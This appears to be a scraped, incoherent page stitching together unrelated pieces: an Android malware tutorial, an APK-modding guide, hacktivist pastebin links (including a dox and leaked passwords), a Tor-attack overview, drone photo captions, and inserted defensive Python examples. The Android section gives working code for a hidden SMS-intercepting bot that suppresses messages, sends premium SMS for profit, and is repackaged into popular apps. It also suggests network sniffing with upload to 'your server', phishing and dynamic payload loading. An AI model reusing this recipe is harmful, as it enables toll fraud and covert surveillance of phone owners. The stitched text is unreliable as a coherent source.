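            + seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
            + seg(0xE1, EXIF_ID + tiff)
            + seg(0xDA, b"\x00" * 6) + b"\x12\x34" + b"\xff\xd9")


if __name__ == "__main__":
    sample = build_sample()
    print("before:", metadata_report(sample))
    print("after: ", metadata_report(strip_exif(sample)))
```
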

Intro to Android Malware

Most of the malware people here are only working with desktop exploits and web apps (and servers), which is a bit disheartening since Android malware seems to have way more potential for much less effort. Not only that, but infected phones can be turned directly into a profit by abusing premium phone numbers and premium sms numbers. No need to deal with banking or credit card security measures, or with fraud detection. Plus, infected phones make incredible proxies because they’re almost always online, and there are fewer tools to detect them (has anyone even heard of a GSM/CDMA NIDS?).
i think it’s safe to say that most malware coders have never written an Android application, and working in Tor to boot is a different mindset. i will, however, go over the app system by stepping through a program that intercepts SMS, listens for commands, and responds.

Android App Overview

in the Android OS and this applies to most cell devices -/ in writing malware for android you must understand there are four “forms” that an application can take:

Activity – Service – Receiver – Provider

  • Activities run in the foreground.
  • Services either run in the background or provide an interface for functionality between applications.
  • Receivers act on publicized information.
  • Providers offer an interface to data between applications.

Anything you package should be declared in the AndroidManifest.xml file within the <application> section.

One important thing to note is that all of these are treated equally in a packaged application. The fact that a Receiver doesn’t have to interact with a user doesn’t mean that it can’t be packaged alone. With that, it’s possible to run code effectively on install since there’s no need to wait for a user to run your app before you can do something useful. Your options for this are to either package a Service and wait for someone to want to use your code, package a Provider and wait for someone to request data, or package a Receiver and wait for someone to publicize information.

Sniffing SMS

The Receiver option is the only one that doesn’t rely on other applications, so let’s create a Receiver.

  • Create a new class, SmsReceiver and make it extend android.content.BroadcastReceiver. All receivers must be a subclass of BroadcastReceiver
  • Create the following method, which is the one called when the system has a new message for a Receiver:

public void onReceive(Context context, Intent intent) {

   }

  • Open up AndroidManifest.xml in Eclipse. Under the “Application” tab, find the section titled “Application Nodes”. Add a Receiver and set the “Name” to “.SmsReceiver”. The prepended dot is short for the application package name.
  • Highlight the “.SmsReceiver” row and Add an “Intent Filter”. All Receivers need to explicitly say what information they’re looking for, and this is how to do it. Set the Name to “android.provider.Telephony.SMS_RECEIVED”.
  • Now in AndroidManifest.xml, navigate to the “Permissions” tab. Add a “Uses Permission” named android.permission.RECEIVE_SMS. This is a requirement for any application that wants to receive the sms broadcast.

And with that, you have a class that receives all incoming SMS messages. To actually parse the message, I’m going to steal some code from the Android framework.

This code was copied (almost) directly from the Android source:

   public final SmsMessage[] getMessagesFromIntent(Intent intent) {
        Object[] messages = (Object[]) intent.getExtras().getSerializable("pdus");
        byte[][] pduObjs = new byte[messages.length][];
        for (int i = 0; i < messages.length; i++) {
            pduObjs[i] = (byte[]) messages[i];
        }
        byte[][] pdus = new byte[pduObjs.length][];
        int pduCount = pdus.length;
        SmsMessage[] msgs = new SmsMessage[pduCount];
        for (int i = 0; i < pduCount; i++) {
            pdus[i] = pduObjs[i];
            msgs[i] = SmsMessage.createFromPdu(pdus[i]);
        }
        return msgs;
    }

Now we can inspect the messages and react accordingly:

public void onReceive(Context context, Intent intent) {
      SmsMessage[] messages = this.getMessagesFromIntent(intent);
      for(SmsMessage msg : messages) {
         // sender can be found in msg.getDisplayOriginatingAddress()
         // body can be found in msg.getDisplayMessageBody()
      }
   }

Hiding SMS

So what if we decide that the message shouldn’t be shown to the user? If we’re the first ones to receive the broadcast, we can make sure nobody else gets it with a call to abortBroadcast(). To make sure we’re the first ones to get it, we need to raise our Receiver’s priority:

  • Open AndroidManifest.xml again and navigate to the “Application” tab.
  • Select the “Intent Filter” created earlier, and set “Priority” to “999”

For some broadcasts, a higher priority means you get the message earlier and can abort earlier. Beyond some number, you drop back down to the lowest priority. I haven’t tried to figure out the number (probably Integer.MAX_VALUE or Long.MAX_VALUE).

Sending SMS

Now to respond (or for premium sms), you need to be able to send sms:

  • AndroidManifest.xml, add the “android.permission.SEND_SMS” in the same way you added “android.permission.RECEIVE_SMS”

And… well, that’s pretty much it. You can now send sms messages with the following code:

SmsManager sm = SmsManager.getDefault();
sm.sendTextMessage("phone-number-here", null, "message", null, null);

This is really all you need to start writing your own sms bot for Android. You can do basically anything without root exploits, as long as you can convince a user to keep the app on his phone. This isn’t a problem at all if you’re repackaging popular apps with this running in the background (see Sharing and Modding Android Apps). Keep in mind the root exploits are really only useful for hiding permissions from the user and staying on the phone after an uninstall (or preventing an uninstall).

If you have questions about this or some other Android features/malware, feel free to post here. I’m considering making an Android exploit kit, but I need there to be more interest in it. And if you’re having trouble coming up with other ideas…

  • Send annoying notifications until the user sends some sms (to avoid needing the SEND_SMS permission)
  • Load tcpdump to sniff all network traffic and upload the results to your server
  • Hijack bookmarked web pages for advanced phishing
  • Fake SMS for advanced phishing
  • Steal a huge amount of info and send SMS for advanced social engineering
  • Load code dynamically for future root exploits or for very flexible bots (or PPI)
  • Display ads while the user is away for revenue
  • etc, etc
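The manifest entries walked through above (an SMS_RECEIVED receiver, a raised intent-filter priority, the RECEIVE_SMS and SEND_SMS permissions, no Activity) are also what an app reviewer can look for. The following is an added example, not code from the original post: it audits a manifest that has already been decoded to text XML (inside an APK it is stored as binary XML), and the function names, the priority threshold and both sample manifests are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"   # namespace of android:* attributes
SMS_ACTION = "android.provider.Telephony.SMS_RECEIVED"
HIGH_PRIORITY = 900   # assumption: review threshold picked for this example

# Constructed sample: a receiver-only package shaped like the one described above.
SUSPICIOUS = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.wallpaper">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application>
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed sample: an ordinary messaging app with a launcher icon.
BENIGN = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.messenger">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application>
    <activity android:name=".Inbox">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name=".Incoming">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""


def names(parent, tag):
    """Set of android:name values on all <tag> elements below parent."""
    return {e.get(A + "name") for e in parent.iter(tag)}


def parse_priority(value):
    """android:priority as int; None when it is a resource reference we cannot resolve."""
    if value is None:
        return 0
    try:
        return int(value, 0)
    except ValueError:
        return None


def has_launcher(root):
    """True when some Activity is reachable from the launcher (activity-alias ignored)."""
    for act in root.iter("activity"):
        for filt in act.iter("intent-filter"):
            if ("android.intent.action.MAIN" in names(filt, "action")
                    and "android.intent.category.LAUNCHER" in names(filt, "category")):
                return True
    return False


def audit_manifest(xml_text):
    """Return the package name, finding codes and a review verdict for one manifest."""
    root = ET.fromstring(xml_text)   # for untrusted files, parse with a hardened XML parser
    codes = []
    for recv in root.iter("receiver"):
        for filt in recv.iter("intent-filter"):
            if SMS_ACTION not in names(filt, "action"):
                continue
            codes.append("sms-receiver")
            prio = parse_priority(filt.get(A + "priority"))
            if prio is None:
                codes.append("sms-priority-unresolved")
            elif prio >= HIGH_PRIORITY:
                codes.append("sms-high-priority")
    if "android.permission.SEND_SMS" in names(root, "uses-permission"):
        codes.append("send-sms")
    if not has_launcher(root):
        codes.append("no-launcher")
    review = "sms-high-priority" in codes or {"sms-receiver", "send-sms"} <= set(codes)
    return {"package": root.get("package"), "codes": codes, "needs_review": review}


if __name__ == "__main__":
    for sample in (SUSPICIOUS, BENIGN):
        print(audit_manifest(sample))
```
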

Sharing and Modding Android Apps

This is a guide to move an app to your computer so you can mod it as you like. It isn’t a guide to cracking applications. This is an alternative to using an “App to SD” app, a lot of which are apparently buggy and don’t work on all apps. As far as I know, this method always works, and it gives you the option of automating the task.

Tools you’ll need

Android SDK: This comes with a bunch of tools you can use to communicate with your phone. The ones we care about are adb, used to communicate between your computer and a running android device, and android, a front-end to an android emulator. http://developer.android.com/sdk/index.html

Baksmali: This program understands and disassembles Android’s binaries to smali, an assembly language for Android applications. http://code.google.com/p/smali/downloads/detail?name=baksmali-1.3.0.jar&can=2&q=

Smali: This program converts smali assembly files into dex files. This will be used to apply any modifications to applications. http://code.google.com/p/smali/downloads/detail?name=smali-1.3.0.jar&can=2&q=

Java: You’ll need it to run baksmali. You can use your package manager to install this or use the link below. Remember to disable Java plugins in your web browser for being an infectious piece of shit. http://www.java.com/en/download/manual.jsp?locale=en

Setting everything up

Unpack the Android SDK to any directory and navigate to the tools folder. You’ll see a bunch of executables in here. I’m going to assume that this folder is now in your PATH environment variable so you can access them from anywhere. Google “set path variable windows|linux|mac” if you don’t know how to do this.

Now create a folder anywhere named “apps” and copy both baksmali.jar and smali.jar into there. This is where your applications will be copied to. Open a terminal or command prompt and navigate to this directory. From this point on, I’ll assume that baksmali.jar and smali.jar are in the working directory.

Your phone should have come with a USB charger. This charger doubles as a general way of talking to your phone (not just transferring files). To do this…

  • Hook up your phone to your computer using the USB charger
  • Navigate to Settings -> Applications -> Development
  • Enable USB Debugging

At this point, you can play around with a shell on your phone with

adb -d shell

Now we’ll have to grab some files from your phone so those platform-specific odex files can be converted to platform-independent dex files. These commands will probably get everything you need (copy/paste is your friend):

adb -d pull /system/framework/services.odex
adb -d pull /system/framework/framework.odex
adb -d pull /system/framework/android.policy.odex
adb -d pull /system/framework/ext.odex
adb -d pull /system/framework/javax.obex.odex
adb -d pull /system/framework/core.odex
adb -d pull /system/framework/pm.odex
adb -d pull /system/framework/ime.odex
adb -d pull /system/framework/bmgr.odex
adb -d pull /system/framework/am.odex
adb -d pull /system/framework/input.odex
adb -d pull /system/framework/svc.odex

If a command in a later step ever complains about a missing file.odex, and if the application runs on your phone, then you should run the following to get that file:

adb -d pull /system/framework/file.odex

Copying over the apps

Now to actually grab an application. All installed applications are stored in /system/app. If you’ve ever developed an application, you probably know that an apk file is the format that Android knows how to install, and it contains everything about the app. So if you want to share an app with other people, that’s what you would need to grab. Unfortunately, Android splits up the actual code from the metadata, and the apk files in this folder only contain the metadata. The code for MyApp.apk is stored in the optimized, platform-specific MyApp.odex. We’ll have to make this platform-agnostic and recombine the two files.

Pull both files.

adb -d pull /system/app/MyApp.apk

adb -d pull /system/app/MyApp.odex

And decompile the odex file so it can be easily modified:

java -jar baksmali.jar -x MyApp.odex -o MyApp

At this point, you can apply whatever changes you want before recompiling the application into a platform-independent apk. To recompile the application:

java -jar smali.jar MyApp -o classes.dex

And move it into the apk file. This can be done with any zip-modifying utility, like 7zip. I like to do this using the zip utility in linux:

zip -g MyApp.apk classes.dex

And that’s all! If you want to re-install the application, you’ll have to re-sign the new apk following the instructions in the following link. If anyone asks for it, I can append an abridged guide here. http://developer.android.com/guide/publishing/app-signing.html

Congratulations! You can now modify and share your Android applications! Post here if you have any problems following this guide, I’ll be glad to help.
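Why the re-signing step exists, and how a reviewer can spot an APK that was modified after signing, shown as an added example that is not part of the original guide: a JAR-signed APK lists a digest for every file in META-INF/MANIFEST.MF, so a classes.dex appended with zip is either unlisted or no longer matches. The helper names and the in-memory sample archive are constructed here, and the check covers only this first layer (it does not verify the .SF/.RSA signature over the manifest, nor the newer APK signature schemes).

```python
import base64
import hashlib
import io
import re
import zipfile

# Signature bookkeeping files are not themselves listed in MANIFEST.MF.
SIG_FILE = re.compile(r"^META-INF/(MANIFEST\.MF|[^/]+\.(SF|RSA|DSA|EC))$", re.I)
HASHES = {"SHA1": "sha1", "SHA-1": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}


def parse_manifest(text):
    """Return {entry name: attributes} from MANIFEST.MF, unfolding wrapped lines."""
    sections, current, last_key = [], {}, None
    for raw in text.replace("\r\n", "\n").split("\n"):
        if raw == "":                                # blank line ends a section
            if current:
                sections.append(current)
            current, last_key = {}, None
        elif raw.startswith(" ") and last_key:       # continuation of the previous value
            current[last_key] += raw[1:]
        elif ": " in raw:
            last_key, value = raw.split(": ", 1)
            current[last_key] = value
    if current:
        sections.append(current)
    return {s["Name"]: s for s in sections if "Name" in s}


def check_apk(apk_bytes):
    """Map each problem entry to 'unlisted', 'mismatch', 'no-digest' or 'missing'."""
    problems = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        listed = parse_manifest(z.read("META-INF/MANIFEST.MF").decode("utf-8"))
        present = [n for n in z.namelist() if not n.endswith("/")]
        for name in present:
            if SIG_FILE.match(name):
                continue
            attrs = listed.get(name)
            if attrs is None:
                problems[name] = "unlisted"          # added after the manifest was written
                continue
            data, checked = z.read(name), 0
            for key, value in attrs.items():
                alg = HASHES.get(key[:-len("-Digest")]) if key.endswith("-Digest") else None
                if alg is None:
                    continue
                checked += 1
                actual = base64.b64encode(hashlib.new(alg, data).digest()).decode()
                if actual != value:
                    problems[name] = "mismatch"      # content changed after signing
            if checked == 0:
                problems.setdefault(name, "no-digest")
        for name in listed:
            if name not in present:
                problems[name] = "missing"
    return problems


def build_sample_apk(files):
    """Constructed sample: a zip whose MANIFEST.MF covers `files` (no real signature)."""
    lines = ["Manifest-Version: 1.0", "Created-By: constructed-sample", ""]
    for name, data in files.items():
        digest = base64.b64encode(hashlib.sha1(data).digest()).decode()
        lines += [f"Name: {name}", f"SHA1-Digest: {digest}", ""]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "\r\n".join(lines) + "\r\n")
        for name, data in files.items():
            z.writestr(name, data)
    return buf.getvalue()


def append_entry(apk_bytes, name, data):
    """Append one file to the archive, as growing it with a zip tool would."""
    buf = io.BytesIO(apk_bytes)
    with zipfile.ZipFile(buf, "a") as z:
        z.writestr(name, data)
    return buf.getvalue()


def replace_entry(apk_bytes, name, data):
    """Rewrite the archive with one entry's content swapped, manifest untouched."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for item in src.namelist():
            dst.writestr(item, data if item == name else src.read(item))
    return out.getvalue()


if __name__ == "__main__":
    signed = build_sample_apk({"AndroidManifest.xml": b"<binary xml>", "res/icon.png": b"\x89PNG"})
    print("as signed:", check_apk(signed))
    print("repacked: ", check_apk(append_entry(signed, "classes.dex", b"dex\n035\x00")))
```
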

07/9/12

Latino Hacktivist on the Rise

gAtO cHeKs –  http://pastebin.com/trends  – every day or so just to get a pulse on the hacktivist movement. One thing has changed: I see more and more Latinos getting involved in social cyber activism. Below is a breakdown of what I saw; it’s good to see the Latino nation using social media for political dialog. As more of the world understands the importance of the new ways of connecting via the matrix, we will have more freedom of speech in cyberspace for everyone.

Let’s take a look at what my Latino brothers and sisters, si – Latina women are very much in the hacktivist roles all over Twitter sphere (#tangodown #dos ). Let’s take a look at today Sunday 1407 July,8 2012 -

A few post – goes out to the new cyber latino hacktivist and of course give thanks to Sweden and Italy brothers and sisters that have help the education of the spanish crowd-source with cyber hacktivist 101. But this was a big hit to -.MX Mexico is becoming a new cyber hot-bed for these cyber strikes –/ I have seen more and more hacktivist attacks at the Mexican politicals like MEGAMARCHA- against  “Public Radio International” or their message../ mAyBe nO-sI –-  it’s about the PRI Mexican Party, corruption and the protesters went for both, that party and the Radio noise that helped them.

Besides Mexico, you have a push at UASD from a few sources with the Spanish hacktivist–/  a -DoX from Columbia I think  and a plan for the Olympics cyber lulz. From the Latino community this is a big show and tell on pastebin.com  – gAtO oUt

Reference:

.02.) Mexico 1. http://pastebin.com/CRu8raYU #PrimaveraMexicana—— #Anonymous #Opmexico #Megamarcha #ExigimosDemocracia #PrimaveraMexicana#PrimaveraMexicana

 

.01.) Mexico MEGAMARCHA -MEGAMARCHA! this was the new dump: http://pastebin.com/HcCN7kCv

  1. MADE BY CONDOR SECTOR404. GREETINGS, BROTHERS
  2. MEGAMARCHA VS the PRI, at whatever time you want we start:
  3. GREETINGS LATIN AMERICA, IBERO-AMERICA, ANONEXICO, ANONIMOUSMEXICO, BRASIL, OPCOSTARICA, OPINDIA, ANONSWEDEN, ITALY

 

Latino Hacktavist- @gAtOmAlO2

 

1.) Mexico 1. #Anonymous México. #OpMarchaPacifica – Untitled  http://pastebin.com/S8kZ02Ua

2.) Operación #OPSalvemos a la #UASD, Gracias por Leer esto #Op Salvemos la UASD. –http://pastebin.com/z1qTzz3n

3.) FALSA BANDERA OLIMPIADAS 2012 (NUEVOS AÑADIDOS) -Olympic Plans Overview – This is a planing stage Olympics latino based in London http://pastebin.com/T5Gu6p6s

4.) A spanish DoX – DOXEO JUAN PABLO FRANZONI http://pastebin.com/2WGmPgcx 

5.) Dominican Anonymous.-Anonymous Explica como esta hackiando la pagina de la UASD. http://pastebin.com/G5yE6uGr  – Administrators or webmaster of the site of the #UASD

6.) Mexico – Leaks Name & Password http://pastebin.com/GjTGdC6k -@Anonymousbr11  @Anon_central @AnonymousOIC  Target:http://www.isc.gob.mx

05/21/12

USCyberLabs -New Site in the Deep Web

gAtO JuSt -wanted to invite you to a new place in the Deep, Dark Web – sounds nefarious (;-) nah – The .onion network is just a place to stay anonymous – there are legit reasons why someone may want to see information in a more private way, so I have just started the new site in the ToR Network:

Deep Web gAtO - mEoW

http://4eiruntyxxbgfv7o.onion/snapbbs/19cc6d6e/ =+ USCyberlabs.com

On this BBS board I will post everything I do in the clearWeb uscyberlabs.com . Since it’s open to anyone I wonder what and who will see it and post in it – it should be fun… Please feel free to stop and visit if your in the deepWeb and want to come in and tell me secrets or tell me that I’m full of it. It is open to the public and anyone can come in and browse and post. I want to keep it clean a Gray-White Hat place to distribute information. But I will try not to edit stuff gATO oUt

05/21/12

Attacking a ToR Network

Attacking a ToR .network

gAtO hAs- found that there are a few ways to attack a secure network; some are old-fashioned technology and some more modern. The FBI and Secret Service and other international law enforcement have used these techniques and they have been de-classified:

UPDATE: -5-21-2012 -0900 There are a few more attack vectors that I recently found in the .onion network – let’s just say attack from within that – If you are a legit-legal Security Researcher please write me. I want to keep those secret for now –

Let’s take a look at:

The Cold Boot Attacks

One of the problems with encryption is that in order for it to work, your computer has to know the private key and any other information needed for decryption. This information is stored in memory and while memory isn’t a good place to store things long term, it does store data for an amount of time from seconds to minutes after your machine has been turned off. An adversary, knowing that they are facing a locked down machine with lots of encryption, may perform a cold boot attack. This involves turning off your computer, spraying your memory with liquid nitrogen (or something to keep it cold), and then recovering your encryption key from memory. Once frozen, data in memory can be retained (and then further reconstructed) for hours. Countermeasures:  If you feel this is a risk, you need to implement physical security measures that deal with the possible threat. This could be as simple as a laser tripwire on a door that triggers a shutdown.

Radio Leakage, TEMPEST, etc.

All electronics create radio interference as a consequence of their operation. While this radio interference is often useless it can also provide valuable information for your adversary. For instance, the radio interference generated by keyboards can divulge your passwords to an adversary sitting across the street from your house. RF shielding is the only solution for this problem and involves surrounding your machine in some type of metal. This isn’t all though, as the power pull generated when you use the keyboard, etc. can also be monitored through your wall socket. I don’t know of any solutions to this. One idea would be to lock your machine in a box with a UPS to filter the electricity and a security scheme similar to the one used to prevent cold boot attacks but I’m not sure how effective this would be. Countermeasures: Get some chicken wire and build a faraday cage for all your secure computing equipment. Whatever music you like, play it loud. I would suggest Metal; this is filled with so many harmonics that it will be very hard to extract the EMF.

Physical Security

An adversary may put a camera, microphone, or some other recording device in the room with your hidden service machine. If they capture your encryption passphrase, your data will be compromised. Recently the FBI and Secret Service used this technique against a bust of the ShadowCrew carding board and it’s been used for a long time by both law enforcement and intelligence. While using a blanket will deter a camera, the audio generated by your keyboard may not be sufficiently muffled to stop a microphone from knowing what’s going on. Countermeasures:  Always be careful of anyone coming into the place where your computing equipment or office is. Remember that today’s technology has WiFi cameras and all kinds of devices. Also check your router to see any weird connections to it, and remember the logs; they will show failed attempts to access your network. Another way is to scan for SSIDs with Kismet or NetStumbler; you may be able to scan for the device. And for microphones: whatever music you like, play it loud. I would suggest Metal; this is filled with so many harmonics that it will be very hard to extract the signal from the noise.

Traffic Correlation

If your adversary suspects you run a hidden service, they can watch your internet connection and try to use traffic analysis to determine if the hidden service is run on your network. If your adversary downloads a few 50 megabyte files from your server and every time around 50MB of encrypted traffic goes across your network, it’s pretty good evidence. Combine that with shutting off the power to your machine and watching the hidden service go down and you’ve got somebody who knows what’s going on.  Countermeasures: There are creative ways of dealing with this such as cover traffic, UPSs, redundant servers, and physical security.

a government censor can render it moot by simply blocking the relays

 

gAtO hopes that this will help you understand the ToR network a little better, and don’t worry, the Tor Project is working hard on Traffic Correlation attacks. – gAtO oUt

 

https://blog.torproject.org/blog/research-problem-measuring-safety-tor-network

 

05/20/12

Cyber Warrior Drones of War

 gAtO wAs – looking into the modern Air/Sea cyber warfare and came across these pictures from - cryptome.org this is really some cool shot and we can only imagine the future. In 5 to 10 years these cyber warriors may well be autonomous air warriors not just guided by man but under computers control. From Nato to the U.S everyone is getting into the remote killing machines. I think of SkyNet in the Terminator movie and we are not far off the mark.

Now add state actors hackers to terrorist hackers if they get their hands on these babies well the mayhem and destruction they will cause will make your head spin. The sad fact is as more and more of these remote killers are used, we will become more desensitized to the horror of war. The only reason gATo hates war is because I been at the killing field, I was in it and did my share and after the battle and the buzz wears off , the horror that I had just committed will haunt me forever. These machines will not. When it’s all a video game we will just go for the high score and go to the next level– gAtO oUt

Drone Photos

[Image]In this March, 28, 2012, photo, an Arcti Copter 5 drone flies over a waterfront
park in Berkeley, Calif. Interest in the domestic use of drones is surging
among public agencies and private citizens alike, including a thriving subculture
of amateur hobbyists, even as the prospect of countless tiny but powerful
eyes circling in the skies raises serious privacy concerns. (Eric Risberg)
[Image]In this March, 28, 2012, photo, Mark Harrison, left, and Andreas Oesterer,
right, watch as a Ritewing Zephyr II drone lifts off at a waterfront park
in Berkeley, Calif. Interest in the domestic use of drones is surging among
public agencies and private citizens alike, including a thriving subculture
of amateur hobbyists, even as the prospect of countless tiny but powerful
eyes circling in the skies raises serious privacy concerns. (Eric Risberg)
[Image]A quadrocopter drone equipped with a camera stands on display at the Zeiss
stand on the first day of the CeBIT 2012 technology trade fair on March 6,
2012 in Hanover, Germany. CeBIT 2012, the world’s largest information technology
trade fair, will run from March 6-10, and advances in cloud computing and
security are major features this year. Getty
[Image]A drone equipped with cameras and sensors flies over a simulation of a
contaminated area during a training exercise of a nuclear accident following
an earthquake in the region of the nuclear site of Cadarache, January 17,
2012. Reuters
[Image]Israeli soldiers dismantle the Skylark drone during a drill on January 16,
2012 near Bat Shlomo, Israel. The Skylark can carry a camera payload of up
to 1kg, has an operational ceiling of 15,000ft and allows users to monitor
any designated point within a 15km radius. The Skylark unit consists of a
ground control element and three drones, which provide battalion-level commanders
with real-time information. Getty
[Image]A TV drone flies beside Canada’s Erick Guay during the second practice of
the men’s Alpine skiing World Cup downhill race at the Lauberhorn in Wengen,
January 12, 2012. Reuters
[Image]Advanced Defense Technology Centre engineer Fumiyuki Sato demonstrates his
spherical observation drone at the opening of the annual Digital Contents
Expo in Tokyo on October 20, 2011. The Japanese defence researcher has invented
a spherical observation drone that can fly down narrow alleys, hover on the
spot, take off vertically and bounce along the ground. Getty
[Image]President of French far-right party Front national (FN) and candidate for
the 2012 French presidential election Marine Le Pen looks at a drone helicopter
at the stand of French company Eden as she visits on October 19, 2011 in
Paris, at France’s Milipol global security trade fair on October
18, 2011 in Paris. Milipol Paris 2011, welcoming more than 1,000 exhibiting
companies from 43 countries, runs until October 21. Getty
[Image]This Sept. 2011 photo provided by Vanguard Defense Industries, shows a ShadowHawk
drone with Montgomery County, Texas, SWAT team members. Civilian cousins
of the unmanned military aircraft that have been tracking and killing terrorists
in the Middle East and Asia are being sought by police departments, border
patrols, power companies, news organizations and others who want a bird’s-eye
view. AP
[Image]A Pakistani villager holds a wreckage of a suspected surveillance drone which
is crashed in Pakistani border town of Chaman along the Afghanistan border
in Pakistan on Thursday, Aug 25, 2011. Suspected US surveillance drone crashes
in Pakistan military area near border with Afghanistan. (Shah Khalid)
[Image]A maple seed is seen on the hand of Craig Stoneking, bottom, project manager
at Lockheed Martin Advance Technology Laboratories, as engineer David Sharp
holds the company’s new drone, Wednesday, Aug. 10, 2011, in Southampton,
N.J. The unmanned, one-winged flight machine is based on the flight of maple
seeds that twirl down from trees during the spring. AP
[Image]Pakistani officials collect remains of a Pakistan Navy unmanned aerial vehicle
(UAV) which crashed outside an oil refinery in Karachi, Pakistan on Tuesday,
July 19, 2011. According to a Pakistan Navy official, the accident was caused
by a bird hit. No casualties were reported. (Shakil Adil)
[Image]Dr. Gregory Parker, Micro Air Vehicle team leader, holds a small winged drone
that resembles an insect, in the U.S. Air Force Micro Air Vehicles lab at
Wright Patterson Air Force Base in Dayton, Ohio, July 11, 2011. The Micro
Air Vehicles unit of the Air Force Research Laboratory at Wright Patterson
AFB is developing small military drones, with the goal of making them so
small that they resemble small birds and insects, including some that will
have moving wings. The mission is to develop MAVs that can find, track and
target adversaries while operating in complex urban environments. The engineers
are using a variety of small helicopters and drones in the lab to develop
the programs and software. Testing takes place in a controlled indoor lab
where the team flies the MAVs and then gathers data to analyze for further
development. Reuters
[Image]A model of an insect size U.S. Air Force drone is held by a member of the
Micro Air Vehicles team of the Air Force Research Laboratory, which is developing
small drones at Wright Patterson Air Force Base in Dayton, Ohio, July 11,
2011. Reuters
[Image]A computer controlled U.S. Air Force drone prepares to lift off for a test
flight in the Micro Air Vehicles lab at Wright Patterson Air Force Base
in Dayton, Ohio, July 11, 2011. Reuters
[Image]This product image provided by Parrot, shows the AR.Drone. Parrot, a company
known more for its Bluetooth hands-free car speakerphones, has launched a
small, unmanned aircraft that can be controlled using an iPhone or another
of Apple Inc.’s Wi-Fi-enabled gadgets, including the iPod Touch and the
iPad.(Parrot)
[Image]This undated handout photo provided by the U.S. Air Force shows a MQ-9 Reaper,
armed with GBU-12 Paveway II laser guided munitions and AGM-114 Hellfire
missiles, piloted by Col. Lex Turner during a combat mission over southern
Afghanistan. (Lt. Col. Leslie Pratt, US Air Force)
[Image]This undated photo provided by U.S. Customs and Border Protection shows an
unmanned drone used to patrol the U.S.-Canadian border. The planes, which
are based out of North Dakota, are now venturing as far as Eastern Washington
on their patrols. (U.S. Customs and Border Protection)
[Image]

U.S. Navy Boatswain’s Mate 3rd Class Christian Riddle, left, and Boatswain’s
Mate 2nd Class Dante Galati secure a recovered Air Force BQM-74C Chukar III
aerial target drone to a crane aboard USS Tortuga (LSD 46) after an at-sea
exercise for Cooperation Afloat Readiness and Training (CARAT) 2011 in the
South China Sea June 11, 2011. CARAT is a series of bilateral exercises held
annually in Southeast Asia to strengthen relationships and enhance force
readiness. (U.S. Navy photo by Mass Communication Specialist 2nd Class Katerine
Noll/Released)[Image]

An X-47B Unmanned Combat Air System Demonstrator (UCAS-D) completes its first
flight at Edwards Air Force Base, Calif., Feb. 4, 2011. The UCAS-D program
will demonstrate the capability of an autonomous, low-observable unmanned
aircraft to perform carrier launches and recoveries. (DoD photo courtesy
of Northrop Grumman/Released). Date Shot: 2/4/2011

[Image][Image]

Air Photo Service Co. Inc, Japan, January 2011[Image]

U.S. Army Sgt. Brian Curd, and Spc. Nicholas Boxley, both combat engineers,
from Echo Company, 1st Battalion, 68th Armor Regiment, 3rd Advise and Assist
Brigade, 4th Infantry Division, prepare the RQ-16A Tarantula Hawk unmanned
aerial vehicle, for operation, at Basra province, Iraq, Dec. 1, 2010. Although,
T-Hawk requires a great deal of maintenance, the capabilities it provides
are well worth the time spent. (U.S. Army photo by 2nd Lt. Matthew
Fumagalli/Released). Date Shot: 12/1/2010[Image]

Engineers, from left, Daniel Braun, Eric Sanchez and David Barney, with Space
and Naval Warfare Systems Command Systems Center Pacific, perform pre-deployment
inspections on Littoral Battlespace Sensing Unmanned Undersea Vehicles aboard
the oceanographic survey ship USNS Pathfinder (T-AGS 60) while portside in
San Diego, Calif., Oct. 21, 2010. Each vehicle hosts a payload suite of sensors
that will measure the physical characteristics of the water column as it
routinely descends and ascends in the ocean. (U.S. Navy photo by Rick
Naystatt/Released). Date Shot: 10/21/2010[Image]

U.S. Navy Aerographer’s Mate Airman Alex Boston, left, and Aerographer’s
Mate 3rd Class Ryan Thuecks, right, both assigned to the Naval Oceanography
Mine Warfare Center, and Ana Ziegler, with the Office of Naval Research,
deploy an unmanned underwater vehicle during exercise Frontier Sentinel in
the northern Atlantic Ocean June 9, 2010. The annual joint maritime homeland
security exercise involved the Canadian navy, the U.S. Navy and Coast Guard,
and federal, state, and local agencies in the detection, assessment and response
to maritime security threats. (U.S. Navy photo by Wayne Stigstedt/Released).
Date Shot: 6/9/2010[Image]

U.S. Navy Sonar Technician Surface 1st Class Bryson Menke and Mineman 3rd
Class Michael Darcy, both stationed with Explosive Ordnance Disposal Mobile
Unit (EODMU) 1, prepare to deploy an unmanned underwater vehicle April 22,
2010, in the Persian Gulf. EODMU-1 and USS Dextrous (MCM 13) are conducting
drills. (U.S. Navy photo by Mass Communication Specialist 2nd Class Ja’lon
A. Rhinehart/Released). Date Shot: 4/22/2010[Image]

Danielle Bryant, right, an oceanographer from the Naval Oceanographic Office
(NAVOCEANO), establishes a satellite connection to the Glider Operations
Center at NAVOCEANO before launching the seaglider unmanned underwater vessel
from the Military Sealift Command oceanographic survey ship USNS Henson (T-AGS
63) March 24, 2010, in the Atlantic Ocean. The vessel is designed to collect
physical oceanography data in deep water. Henson is under way off the coast
of Fortaleza, Brazil, for Oceanographic-Southern Partnership Station 2010
conducting survey demonstrations with the Brazilian Directorate of Hydrograph
and Navigation. Oceanographic-Southern Partnership Station is an oceanographic
surveying and information exchange program between subject matter experts
